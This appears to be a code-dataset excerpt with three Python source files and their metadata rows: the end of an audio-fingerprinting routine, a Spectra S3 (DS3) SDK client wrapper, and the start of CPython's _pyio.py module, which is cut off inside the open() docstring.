amp_min=DEFAULT_AMP_MIN):
"""
FFT the channel, log transform output, find local maxima, then return
    locality-sensitive hashes.
"""
# FFT the signal and extract frequency components
arr2D = mlab.specgram(
channel_samples,
NFFT=wsize,
Fs=Fs,
window=mlab.window_hanning,
noverlap=int(wsize * wratio))[0]
# apply log transform since specgram() returns linear array
arr2D = 10 * np.log10(arr2D)
arr2D[arr2D == -np.inf] = 0 # replace infs with zeros
# find local maxima
local_maxima = get_2D_peaks(arr2D, plot=False, amp_min=amp_min)
# return hashes
return generate_hashes(local_maxima, fan_value=fan_value)
def get_2D_peaks(arr2D, plot=False, amp_min=DEFAULT_AMP_MIN):
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.morphology.iterate_structure.html#scipy.ndimage.morphology.iterate_structure
struct = generate_binary_structure(2, 1)
neighborhood = iterate_structure(struct, PEAK_NEIGHBORHOOD_SIZE)
    # find local maxima using our filter shape
local_max = maximum_filter(arr2D, footprint=neighborhood) == arr2D
background = (arr2D == 0)
eroded_background = binary_erosion(background, structure=neighborhood,
border_value=1)
# Boolean mask of arr2D with True at peaks
detected_peaks = local_max - eroded_background
# extract peaks
amps = arr2D[detected_peaks]
j, i = np.where(detected_peaks)
# filter peaks
amps = amps.flatten()
peaks = zip(i, j, amps)
peaks_filtered = [x for x in peaks if x[2] > amp_min] # freq, time, amp
# get indices for frequency and time
frequency_idx = [x[1] for x in peaks_filtered]
time_idx = [x[0] for x in peaks_filtered]
if plot:
# scatter of the peaks
fig, ax = plt.subplots()
ax.imshow(arr2D)
ax.scatter(time_idx, frequency_idx)
ax.set_xlabel('Time')
ax.set_ylabel('Frequency')
ax.set_title("Spectrogram")
plt.gca().invert_yaxis()
plt.show()
return zip(frequency_idx, time_idx)
def generate_hashes(peaks, fan_value=DEFAULT_FAN_VALUE):
"""
Hash list structure:
sha1_hash[0:20] time_offset
[(e05b341a9b77a51fd26, 32), ... ]
"""
fingerprinted = set() # to avoid rehashing same pairs
if PEAK_SORT:
peaks.sort(key=itemgetter(1))
for i in range(len(peaks)):
for j in range(1, fan_value):
if (i + j) < len(peaks) and not (i, i + j) in fingerprinted:
freq1 = peaks[i][IDX_FREQ_I]
freq2 = peaks[i + j][IDX_FREQ_I]
t1 = peaks[i][IDX_TIME_J]
t2 = peaks[i + j][IDX_TIME_J]
t_delta = t2 - t1
if t_delta >= MIN_HASH_TIME_DELTA and t_delta <= MAX_HASH_TIME_DELTA:
h = hashlib.sha1(
"%s|%s|%s" % (str(freq1), str(freq2), str(t_delta)))
yield (h.hexdigest()[0:FINGERPRINT_REDUCTION], t1)
# ensure we don't repeat hashing
fingerprinted.add((i, i + j))
| mit | -8,347,237,291,707,981,000 | 36.391304 | 148 | 0.589535 | false | 3.886378 | false | false | false |
chanchett/ds3_python_sdk_ | ds3/ds3.py | 1 | 30418 | # Copyright 2014-2015 Spectra Logic Corporation. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use
# this file except in compliance with the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
from ctypes import *
import libds3
def checkExistence(obj, wrapper = lambda ds3Str: ds3Str.contents.value):
if obj:
return wrapper(obj)
else:
return None
def arrayToList(array, length, wrapper = lambda ds3Str: ds3Str.contents.value):
result = []
for i in xrange(0, length):
result.append(wrapper(array[i]))
return result
class Ds3Error(Exception):
def __init__(self, libds3Error):
self.reason = libds3Error.contents.message.contents.value
response = libds3Error.contents.error
self._hasResponse = False
self.statusCode = None
self.statusMessage = None
self.message = None
if response:
self._hasResponse = True
self.statusCode = response.contents.status_code
self.statusMessage = response.contents.status_message.contents.value
self.message = checkExistence(response.contents.error_body)
libds3.lib.ds3_free_error(libds3Error)
def __str__(self):
errorMessage = "Reason: " + self.reason
if self._hasResponse:
errorMessage += " | StatusCode: " + str(self.statusCode)
errorMessage += " | StatusMessage: " + self.statusMessage
if self.message:
errorMessage += " | Message: " + self.message
return errorMessage
def __repr__(self):
return self.__str__()
class Credentials(object):
def __init__(self, accessKey, secretKey):
self.accessKey = accessKey
self.secretKey = secretKey
class Ds3Bucket(object):
def __init__(self, ds3Bucket):
self.name = ds3Bucket.name.contents.value
self.creationDate = ds3Bucket.creation_date.contents.value
def __str__(self):
return "Name: " + self.name + " | Creation Date: " + self.creationDate
def __repr__(self):
return self.__str__()
class Ds3Owner(object):
def __init__(self, ds3Owner):
ownerContents = ds3Owner.contents
self.name = ownerContents.name.contents.value
self.id = ownerContents.id.contents.value
def __str__(self):
return "Name: " + self.name + " | ID: " + self.id
def __repr__(self):
return self.__str__()
class Ds3Object(object):
def __init__(self, ds3Object):
self.name = ds3Object.name.contents.value
self.etag = checkExistence(ds3Object.etag)
self.size = ds3Object.size
self.owner = Ds3Owner(ds3Object.owner)
def __str__(self):
return "Name: " + self.name + " | Size: " + str(self.size) + " | Etag: " + str(self.etag) + " | Owner: " + str(self.owner)
def __repr__(self):
return self.__str__()
class Ds3BucketDetails(object):
def __init__(self, ds3Bucket):
bucketContents = ds3Bucket.contents
self.name = bucketContents.name.contents.value
self.creationDate = checkExistence(bucketContents.creation_date)
self.isTruncated = bool(bucketContents.is_truncated)
self.marker = checkExistence(bucketContents.marker)
self.delimiter = checkExistence(bucketContents.delimiter)
self.maxKeys = bucketContents.max_keys
self.nextMarker = checkExistence(bucketContents.next_marker)
self.prefix = checkExistence(bucketContents.prefix)
self.commonPrefixes = arrayToList(bucketContents.common_prefixes, bucketContents.num_common_prefixes)
self.objects = arrayToList(bucketContents.objects, bucketContents.num_objects, wrapper = Ds3Object)
class Ds3BulkObject(object):
def __init__(self, bulkObject):
self.name = bulkObject.name.contents.value
self.length = bulkObject.length
self.offset = bulkObject.offset
self.inCache = bool(bulkObject.in_cache)
def __str__(self):
return "Name:" + self.name + " | Length: " + str(self.length) + " | Offset: " + str(self.offset) + " | InCache: " + str(self.inCache)
def __repr__(self):
return self.__str__()
class Ds3CacheList(object):
def __init__(self, bulkObjectList):
contents = bulkObjectList.contents
self.chunkNumber = contents.chunk_number
self.nodeId = checkExistence(contents.node_id)
self.serverId = checkExistence(contents.server_id)
self.chunkId = contents.chunk_id.contents.value
self.objects = arrayToList(contents.list, contents.size, wrapper = Ds3BulkObject)
class Ds3BulkPlan(object):
def __init__(self, ds3BulkResponse):
contents = ds3BulkResponse.contents
self.bucketName = checkExistence(contents.bucket_name)
if contents.cached_size_in_bytes:
self.cachedSize = contents.cached_size_in_bytes
if contents.completed_size_in_bytes:
self.compltedSize = contents.completed_size_in_bytes
self.jobId = checkExistence(contents.job_id)
if contents.original_size_in_bytes:
self.originalSize = contents.original_size_in_bytes
self.startDate = checkExistence(contents.start_date)
self.userId = checkExistence(contents.user_id)
self.userName = checkExistence(contents.user_name)
self.requestType = contents.request_type
self.status = contents.status
self.chunks = arrayToList(contents.list, contents.list_size, wrapper = Ds3CacheList)
def __str__(self):
response = "JobId: " + self.jobId
response += " | Status: " + str(self.status)
response += " | Request Type: " + str(self.requestType)
response += " | BucketName: " + self.bucketName
response += " | UserName: " + self.userName
response += " | Chunks: " + str(self.chunks)
return response
def __repr__(self):
return self.__str__()
class Ds3AllocateChunkResponse(object):
def __init__(self, ds3AllocateChunkResponse):
contents = ds3AllocateChunkResponse.contents
self.retryAfter = contents.retry_after
self.chunk = Ds3CacheList(contents.objects)
class Ds3AvailableChunksResponse(object):
def __init__(self, ds3AvailableChunksResponse):
contents = ds3AvailableChunksResponse.contents
self.retryAfter = contents.retry_after
self.bulkPlan = Ds3BulkPlan(contents.object_list)
class Ds3SearchObject(object):
def __init__(self, ds3SearchObject):
contents = ds3SearchObject.contents
self.bucketId = checkExistence(contents.bucket_id)
self.id = checkExistence(contents.id)
self.name = checkExistence(contents.name)
self.size = contents.size
self.owner = checkExistence(contents.owner, wrapper = Ds3Owner)
self.lastModified = checkExistence(contents.last_modified)
self.storageClass = checkExistence(contents.storage_class)
self.type = checkExistence(contents.type)
self.version = checkExistence(contents.version)
def __str__(self):
response = "BucketId: " + str(self.bucketId)
response += " | Id: " + str(self.id)
response += " | Name: " + str(self.name)
response += " | Size: " + str(self.size)
response += " | Owner: (" + str(self.id) + ")"
response += " | LastModified: " + str(self.lastModified)
response += " | StorageClass: " + str(self.storageClass)
response += " | Type: " + str(self.type)
response += " | Version: " + str(self.version)
return response
class Ds3BuildInformation(object):
def __init__(self, ds3BuildInfo):
contents = ds3BuildInfo.contents
self.branch = checkExistence(contents.branch)
self.revision = checkExistence(contents.revision)
self.version = checkExistence(contents.version)
def __str__(self):
response = "Branch: " + str(self.branch)
response += " | Revision: " + str(self.revision)
response += " | Version: " + str(self.version)
return response
class Ds3SystemInformation(object):
def __init__(self, ds3SystemInfo):
contents = ds3SystemInfo.contents
self.apiVersion = checkExistence(contents.api_version)
self.serialNumber = checkExistence(contents.serial_number)
self.buildInformation = checkExistence(contents.build_information, wrapper = Ds3BuildInformation)
def __str__(self):
response = "API Version: " + str(self.apiVersion)
response += " | Serial Number: " + str(self.serialNumber)
response += " | Build Information: " + str(self.buildInformation)
return response
class Ds3SystemHealthInformation(object):
def __init__(self, ds3HealthInfo):
contents = ds3HealthInfo.contents
self.msRequiredToVerifyDataPlannerHealth = contents.ms_required_to_verify_data_planner_health
def typeCheck(input_arg, type_to_check):
if isinstance(input_arg, type_to_check):
return input_arg
else:
raise TypeError("expected instance of type " + type_to_check.__name__ + ", got instance of type " + type(input_arg).__name__)
def typeCheckString(input_arg):
return typeCheck(input_arg, basestring)
def enumCheck(input_arg, enum_dict):
if input_arg in enum_dict.keys():
return enum_dict[input_arg]
else:
raise TypeError("expected value to be one of " + str(enum_dict.keys()) + ", got " + str(input_arg))
def enumCheckDs3ObjectType(input_arg):
return enumCheck(input_arg, {"DATA":0, "FOLDER":1})
def addMetadataToRequest(request, metadata):
if metadata:
for key in metadata:
if type(metadata[key]) is list or type(metadata[key]) is tuple:
for value in metadata[key]:
libds3.lib.ds3_request_set_metadata(request, key, value);
else:
libds3.lib.ds3_request_set_metadata(request, key, metadata[key]);
def extractMetadataFromResponse(metaData):
result = {}
keys = libds3.lib.ds3_metadata_keys(metaData)
if keys:
for key_index in xrange(0, keys.contents.num_keys):
key = keys.contents.keys[key_index].contents.value
metadataEntry = libds3.lib.ds3_metadata_get_entry(metaData, key)
result[key] = arrayToList(metadataEntry.contents.values, metadataEntry.contents.num_values)
libds3.lib.ds3_free_metadata_entry(metadataEntry)
libds3.lib.ds3_free_metadata_keys(keys)
return result
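# Builds a client from environment variables. libds3 typically reads
# DS3_ENDPOINT, DS3_ACCESS_KEY, DS3_SECRET_KEY and http_proxy; treat these exact
# names as an assumption about the underlying C library.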
def createClientFromEnv():
libDs3Client = POINTER(libds3.LibDs3Client)()
error = libds3.lib.ds3_create_client_from_env(byref(libDs3Client))
if error:
raise Ds3Error(error)
clientContents = libDs3Client.contents
clientCreds = clientContents.creds.contents
creds = Credentials(clientCreds.access_id.contents.value, clientCreds.secret_key.contents.value)
proxyValue = checkExistence(clientContents.proxy)
client = Ds3Client(clientContents.endpoint.contents.value, creds, proxyValue)
libds3.lib.ds3_free_creds(clientContents.creds)
libds3.lib.ds3_free_client(libDs3Client)
return client
class Ds3Client(object):
'''
This object is used to communicate with a remote DS3/Spectra S3 endpoint. All communication with the Spectra S3 API is done with this class.
'''
def __init__(self, endpoint, credentials, proxy = None):
self._ds3Creds = libds3.lib.ds3_create_creds(c_char_p(credentials.accessKey), c_char_p(credentials.secretKey))
self._client = libds3.lib.ds3_create_client(c_char_p(endpoint), self._ds3Creds)
self.credentials = credentials
def verifySystemHealth(self):
'''
Returns how long it took to verify the health of the system. In the event that the system is in a bad state, an error will
be thrown.
'''
response = POINTER(libds3.LibDs3VerifySystemHealthResponse)()
request = libds3.lib.ds3_init_verify_system_health()
error = libds3.lib.ds3_verify_system_health(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3SystemHealthInformation(response)
libds3.lib.ds3_free_verify_system_health(response)
return result
def getService(self):
'''
Returns a list of all the buckets the current access id has access to.
'''
response = POINTER(libds3.LibDs3GetServiceResponse)()
request = libds3.lib.ds3_init_get_service()
error = libds3.lib.ds3_get_service(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
contents = response.contents
for i in xrange(0, response.contents.num_buckets):
yield Ds3Bucket(contents.buckets[i])
libds3.lib.ds3_free_service_response(response)
def getBucket(self, bucketName, prefix = None, nextMarker = None, delimiter = None, maxKeys = None):
'''
Returns a list of all the objects in a specific bucket as specified by `bucketName`. This will return at most 1000 objects.
In order to retrieve more, pagination must be used. The `nextMarker` is used to specify where the next 1000 objects will
start listing from.
`delimiter` can be used to list objects like directories. So for example, if delimiter is set to '/' then it will return
        a list of 'directories' in the common prefixes field of the response. In order to list all the files in that directory, use the prefix parameter.
For example:
client.getBucket("my_bucket", prefix = 'dir', delimiter = '/')
The above will list any files and directories that are in the 'dir' directory.
'''
response = POINTER(libds3.LibDs3GetBucketResponse)()
request = libds3.lib.ds3_init_get_bucket(typeCheckString(bucketName))
if prefix:
libds3.lib.ds3_request_set_prefix(request, typeCheckString(prefix))
if nextMarker:
libds3.lib.ds3_request_set_marker(request, nextMarker)
if delimiter:
libds3.lib.ds3_request_set_delimiter(request, typeCheckString(delimiter))
if maxKeys:
libds3.lib.ds3_request_set_max_keys(request, maxKeys)
error = libds3.lib.ds3_get_bucket(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bucket = Ds3BucketDetails(response)
libds3.lib.ds3_free_bucket_response(response)
return bucket
def headObject(self, bucketName, objectName):
'''
Returns the metadata for the retrieved object as a dictionary of lists. If the object does not exist
an error is thrown with a status code of 404.
'''
response = POINTER(libds3.LibDs3Metadata)()
request = libds3.lib.ds3_init_head_object(typeCheckString(bucketName), typeCheckString(objectName))
error = libds3.lib.ds3_head_object(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
metadata = extractMetadataFromResponse(response)
libds3.lib.ds3_free_metadata(response)
return metadata
def headBucket(self, bucketName):
'''
Checks whether a bucket exists.
'''
request = libds3.lib.ds3_init_head_bucket(typeCheckString(bucketName))
error = libds3.lib.ds3_head_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteFolder(self, bucketName, folderName):
'''
Deletes a folder and all the objects contained within it.
'''
request = libds3.lib.ds3_init_delete_folder(typeCheckString(bucketName), typeCheckString(folderName))
error = libds3.lib.ds3_delete_folder(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def getSystemInformation(self):
'''
Returns the version and other information about the Spectra S3 endpoint.
'''
response = POINTER(libds3.LibDs3GetSystemInformationResponse)()
request = libds3.lib.ds3_init_get_system_information()
error = libds3.lib.ds3_get_system_information(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3SystemInformation(response)
libds3.lib.ds3_free_get_system_information(response)
return result
def getObject(self, bucketName, objectName, offset, jobId, realFileName = None):
'''
Gets an object from the Spectra S3 endpoint. Use `realFileName` when the `objectName`
that you are getting from Spectra S3 does not match what will be on the local filesystem.
Returns the metadata for the retrieved object as a dictionary, where keys are
associated with a list of the values for that key.
This can only be used within the context of a Bulk Get Job.
'''
objectName = typeCheckString(objectName)
effectiveFileName = objectName
if realFileName:
effectiveFileName = typeCheckString(realFileName)
response = POINTER(libds3.LibDs3Metadata)()
request = libds3.lib.ds3_init_get_object_for_job(typeCheckString(bucketName), objectName, offset, jobId)
localFile = open(effectiveFileName, "w")
error = libds3.lib.ds3_get_object_with_metadata(self._client, request, byref(c_int(localFile.fileno())), libds3.lib.ds3_write_to_fd, byref(response))
localFile.close()
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
metadata = extractMetadataFromResponse(response)
libds3.lib.ds3_free_metadata(response)
return metadata
def putBucket(self, bucketName):
'''
Creates a new bucket where objects can be stored.
'''
bucketName = typeCheckString(bucketName)
request = libds3.lib.ds3_init_put_bucket(bucketName)
error = libds3.lib.ds3_put_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def putObject(self, bucketName, objectName, offset, size, jobId, realFileName = None, metadata = None):
'''
Puts an object to the Spectra S3 endpoint. Use `realFileName` when the `objectName`
that you are putting to Spectra S3 does not match what is on the local filesystem.
Use metadata to set the metadata for the object. metadata's value should be
a dictionary, where keys are associated with either a value or a list of the
values for that key.
This can only be used within the context of a Spectra S3 Bulk Put job.
'''
objectName = typeCheckString(objectName)
effectiveFileName = objectName
if realFileName:
effectiveFileName = typeCheckString(realFileName)
request = libds3.lib.ds3_init_put_object_for_job(typeCheckString(bucketName), objectName, offset, size, jobId)
addMetadataToRequest(request, metadata)
localFile = open(effectiveFileName, "r")
error = libds3.lib.ds3_put_object(self._client, request, byref(c_int(localFile.fileno())), libds3.lib.ds3_read_from_fd)
localFile.close()
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteObject(self, bucketName, objName):
'''
Deletes an object from the specified bucket. If deleting several files at once, use `deleteObjects` instead.
'''
request = libds3.lib.ds3_init_delete_object(typeCheckString(bucketName), typeCheckString(objName))
error = libds3.lib.ds3_delete_object(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteObjects(self, bucketName, fileNameList):
'''
Deletes multiple objects from the bucket using a single API call.
'''
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
request = libds3.lib.ds3_init_delete_objects(typeCheckString(bucketName))
error = libds3.lib.ds3_delete_objects(self._client, request, bulkObjs)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteBucket(self, bucketName):
'''
Deletes a bucket. If the bucket is not empty, then this request will fail. All objects must be deleted first
before the bucket can be deleted.
'''
request = libds3.lib.ds3_init_delete_bucket(typeCheckString(bucketName))
error = libds3.lib.ds3_delete_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def putBulk(self, bucketName, fileInfoList):
'''
        Initiates a bulk put job with the remote Spectra S3 endpoint. The `fileInfoList` is a list of (objectName, size) tuples.
`objectName` does not have to be the actual name on the local file system, but it will be the name that you must
initiate a single object put to later. `size` must reflect the actual size of the file that is being put.
'''
bulkObjs = libds3.lib.ds3_init_bulk_object_list(len(fileInfoList))
bulkObjsList = bulkObjs.contents.list
for i in xrange(0, len(fileInfoList)):
bulkObjsList[i].name = libds3.lib.ds3_str_init(fileInfoList[i][0])
bulkObjsList[i].length = fileInfoList[i][1]
response = POINTER(libds3.LibDs3BulkResponse)()
request = libds3.lib.ds3_init_put_bulk(typeCheckString(bucketName), bulkObjs)
error = libds3.lib.ds3_bulk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
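    # A hedged sketch of the bulk put workflow built from methods in this class:
    # putBulk() plans the job, getAvailableChunks() (defined below) reports which
    # chunks can currently be processed, and putObject() sends each object. Kept
    # as comments; the attribute names on the wrapper objects (jobId, bulkPlan,
    # chunks, objects, name, offset, length) are assumptions based on the wrapper
    # classes defined earlier in this module and may need adjusting.
    #
    #   fileList = [("obj1.txt", os.stat("obj1.txt").st_size)]
    #   plan = client.putBulk("my_bucket", fileList)
    #   available = client.getAvailableChunks(plan.jobId)
    #   for chunk in available.bulkPlan.chunks:
    #       for obj in chunk.objects:
    #           client.putObject("my_bucket", obj.name, obj.offset, obj.length, plan.jobId)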
def getBulk(self, bucketName, fileNameList, chunkOrdering = True):
'''
        Initiates a bulk get job with the remote Spectra S3 endpoint. All the files that will be retrieved must be specified in
`fileNameList`.
'''
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
response = POINTER(libds3.LibDs3BulkResponse)()
chunkOrderingValue = libds3.LibDs3ChunkOrdering.IN_ORDER
if not chunkOrdering:
chunkOrderingValue = libds3.LibDs3ChunkOrdering.NONE
request = libds3.lib.ds3_init_get_bulk(typeCheckString(bucketName), bulkObjs, chunkOrderingValue)
error = libds3.lib.ds3_bulk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getObjects(self, bucketName = None, creationDate = None, objId = None, name = None, pageLength = None, pageOffset = None, objType = None, version = None):
'''
        Returns a list of objects, optionally filtered by the query arguments below.
'''
# TODO: need to add an example here of what different query strings are supported
request = libds3.lib.ds3_init_get_objects()
response = POINTER(libds3.LibDs3GetObjectsResponse)()
if bucketName:
libds3.lib.ds3_request_set_bucket_name(request, typeCheckString(bucketName))
if creationDate:
libds3.lib.ds3_request_set_creation_date(request, typeCheckString(creationDate))
if objId:
libds3.lib.ds3_request_set_id(request, typeCheckString(objId))
if name:
libds3.lib.ds3_request_set_name(request, typeCheckString(name))
if pageLength:
libds3.lib.ds3_request_set_page_length(request, typeCheckString(str(pageLength)))
if pageOffset:
libds3.lib.ds3_request_set_page_offset(request, typeCheckString(str(pageOffset)))
if objType:
libds3.lib.ds3_request_set_type(request, enumCheckDs3ObjectType(objType))
if version:
libds3.lib.ds3_request_set_version(request, typeCheckString(str(version)))
error = libds3.lib.ds3_get_objects(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = arrayToList(response.contents.objects, response.contents.num_objects, wrapper = Ds3SearchObject)
libds3.lib.ds3_free_objects_response(response)
return result
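    # A few illustrative query combinations for getObjects(), kept as comments
    # (the TODO above asks for examples). The values are placeholders, and the
    # objType value is an assumption about the enum accepted by
    # enumCheckDs3ObjectType.
    #
    #   client.getObjects(bucketName = "my_bucket")               # everything in one bucket
    #   client.getObjects(name = "report.csv", objType = "DATA")  # filter by name and type
    #   client.getObjects(pageLength = 100, pageOffset = 200)     # paginate the listing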
def allocateChunk(self, chunkId):
'''
        *Deprecated* - Allocates a specific chunk in cache so that the objects in that chunk can safely be put
        without needing to handle 307 redirects.
'''
request = libds3.lib.ds3_init_allocate_chunk(chunkId)
response = POINTER(libds3.LibDs3AllocateChunkResponse)()
error = libds3.lib.ds3_allocate_chunk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3AllocateChunkResponse(response)
libds3.lib.ds3_free_allocate_chunk_response(response)
return result
def getAvailableChunks(self, jobId):
'''
        Returns a list of all chunks in a job that can currently be processed. It returns a subset of all chunks,
        and it will keep returning that same set of chunks until all the data in one of the returned chunks has been
        either completely gotten or completely put.
'''
request = libds3.lib.ds3_init_get_available_chunks(jobId)
response = POINTER(libds3.LibDs3GetAvailableChunksResponse)()
error = libds3.lib.ds3_get_available_chunks(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3AvailableChunksResponse(response)
libds3.lib.ds3_free_available_chunks_response(response)
return result
def _sendJobRequest(self, func, request):
response = POINTER(libds3.LibDs3BulkResponse)()
error = func(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getJob(self, jobId):
'''
Returns information about a job, including all the chunks in the job, as well as the status of the job.
'''
request = libds3.lib.ds3_init_get_job(jobId)
return self._sendJobRequest(libds3.lib.ds3_get_job, request)
def getJobs(self):
'''
Returns a list of all jobs.
'''
request = libds3.lib.ds3_init_get_jobs()
response = POINTER(libds3.LibDs3GetJobsResponse)()
error = libds3.lib.ds3_get_jobs(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = []
for index in xrange(0, response.contents.jobs_size):
result.append(Ds3BulkPlan(response.contents.jobs[index]))
libds3.lib.ds3_free_get_jobs_response(response)
return result
def putJob(self, jobId):
'''
Modifies a job to reset the timeout timer for the job.
'''
request = libds3.lib.ds3_init_put_job(jobId)
return self._sendJobRequest(libds3.lib.ds3_put_job, request)
def deleteJob(self, jobId):
'''
Cancels a currently in progress job.
'''
request = libds3.lib.ds3_init_delete_job(jobId)
error = libds3.lib.ds3_delete_job(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def getPhysicalPlacement(self, bucketName, fileNameList, fullDetails = False):
'''
Returns where in the Spectra S3 system each file in `fileNameList` is located.
'''
response = POINTER(libds3.LibDs3GetPhysicalPlacementResponse)()
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
        bucketName = typeCheckString(bucketName)
        # Use the full-details variant only when fullDetails is requested.
        if fullDetails:
            request = libds3.lib.ds3_init_get_physical_placement_full_details(bucketName, bulkObjs)
        else:
            request = libds3.lib.ds3_init_get_physical_placement(bucketName, bulkObjs)
error = libds3.lib.ds3_get_physical_placement(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
placements = []
if response:
placements = arrayToList(response.contents.tapes, response.contents.num_tapes, lambda obj: obj.barcode.contents.value)
libds3.lib.ds3_free_get_physical_placement_response(response)
return placements
| apache-2.0 | 667,016,001,873,500,500 | 42.148041 | 162 | 0.642284 | false | 3.809393 | false | false | false |
batermj/algorithm-challenger | code-analysis/programming_anguage/python/source_codes/Python3.8.0/Python-3.8.0/Lib/_pyio.py | 1 | 93037 | """
Python implementation of the io module.
"""
import os
import abc
import codecs
import errno
import stat
import sys
# Import _thread instead of threading to reduce startup cost
from _thread import allocate_lock as Lock
if sys.platform in {'win32', 'cygwin'}:
from msvcrt import setmode as _setmode
else:
_setmode = None
import io
from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)
valid_seek_flags = {0, 1, 2} # Hardwired values
if hasattr(os, 'SEEK_HOLE'):
valid_seek_flags.add(os.SEEK_HOLE)
valid_seek_flags.add(os.SEEK_DATA)
# open() uses st_blksize whenever we can
DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes
# NOTE: Base classes defined here are registered with the "official" ABCs
# defined in io.py. We don't use real inheritance though, because we don't want
# to inherit the C implementations.
# Rebind for compatibility
BlockingIOError = BlockingIOError
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
_IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def open(file, mode="r", buffering=-1, encoding=None, errors=None,
newline=None, closefd=True, opener=None):
r"""Open file and return a stream. Raise OSError upon failure.
file is either a text or byte string giving the name (and the path
if the file isn't in the current working directory) of the file to
be opened or an integer file descriptor of the file to be
wrapped. (If a file descriptor is given, it is closed when the
returned I/O object is closed, unless closefd is set to False.)
mode is an optional string that specifies the mode in which the file is
opened. It defaults to 'r' which means open for reading in text mode. Other
common values are 'w' for writing (truncating the file if it already
exists), 'x' for exclusive creation of a new file, and 'a' for appending
(which on some Unix systems, means that all writes append to the end of the
file regardless of the current seek position). In text mode, if encoding is
not specified the encoding used is platform dependent. (For reading and
writing raw bytes use binary mode and leave encoding unspecified.) The
available modes are:
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
The default mode is 'rt' (open for reading text). For binary random
access, the mode 'w+b' opens and truncates the file to 0 bytes, while
'r+b' opens the file without truncation. The 'x' mode implies 'w' and
    raises a `FileExistsError` if the file already exists.
Python distinguishes between files opened in binary and text modes,
even when the underlying operating system doesn't. Files opened in
binary mode (appending 'b' to the mode argument) return contents as
bytes objects without any decoding. In text mode (the default, or when
't' is appended to the mode argument), the contents of the file are
returned as strings, the bytes having been first decoded using a
platform-dependent encoding or using the specified encoding if given.
'U' mode is deprecated and will raise an exception in future versions
of Python. It has no effect in Python 3. Use newline to control
universal newlines mode.
buffering is an optional integer used to set the buffering policy.
Pass 0 to switch buffering off (only allowed in binary mode), 1 to select
line buffering (only usable in text mode), and an integer > 1 to indicate
the size of a fixed-size chunk buffer. When no buffering argument is
given, the default buffering policy works as follows:
* Binary files are buffered in fixed-size chunks; the size of the buffer
is chosen using a heuristic trying to determine the underlying device's
"block size" and falling back on `io.DEFAULT_BUFFER_SIZE`.
On many systems, the buffer will typically be 4096 or 8192 bytes long.
* "Interactive" text files (files for which isatty() returns True)
use line buffering. Other text files use the policy described above
for binary files.
encoding is the str name of the encoding used to decode or encode the
file. This should only be used in text mode. The default encoding is
platform dependent, but any encoding supported by Python can be
passed. See the codecs module for the list of supported encodings.
errors is an optional string that specifies how encoding errors are to
be handled---this argument should not be used in binary mode. Pass
'strict' to raise a ValueError exception if there is an encoding error
(the default of None has the same effect), or pass 'ignore' to ignore
errors. (Note that ignoring encoding errors can lead to data loss.)
See the documentation for codecs.register for a list of the permitted
encoding error strings.
newline is a string controlling how universal newlines works (it only
applies to text mode). It can be None, '', '\n', '\r', and '\r\n'. It works
as follows:
* On input, if newline is None, universal newlines mode is
enabled. Lines in the input can end in '\n', '\r', or '\r\n', and
these are translated into '\n' before being returned to the
caller. If it is '', universal newline mode is enabled, but line
endings are returned to the caller untranslated. If it has any of
the other legal values, input lines are only terminated by the given
string, and the line ending is returned to the caller untranslated.
* On output, if newline is None, any '\n' characters written are
translated to the system default line separator, os.linesep. If
newline is '', no translation takes place. If newline is any of the
other legal values, any '\n' characters written are translated to
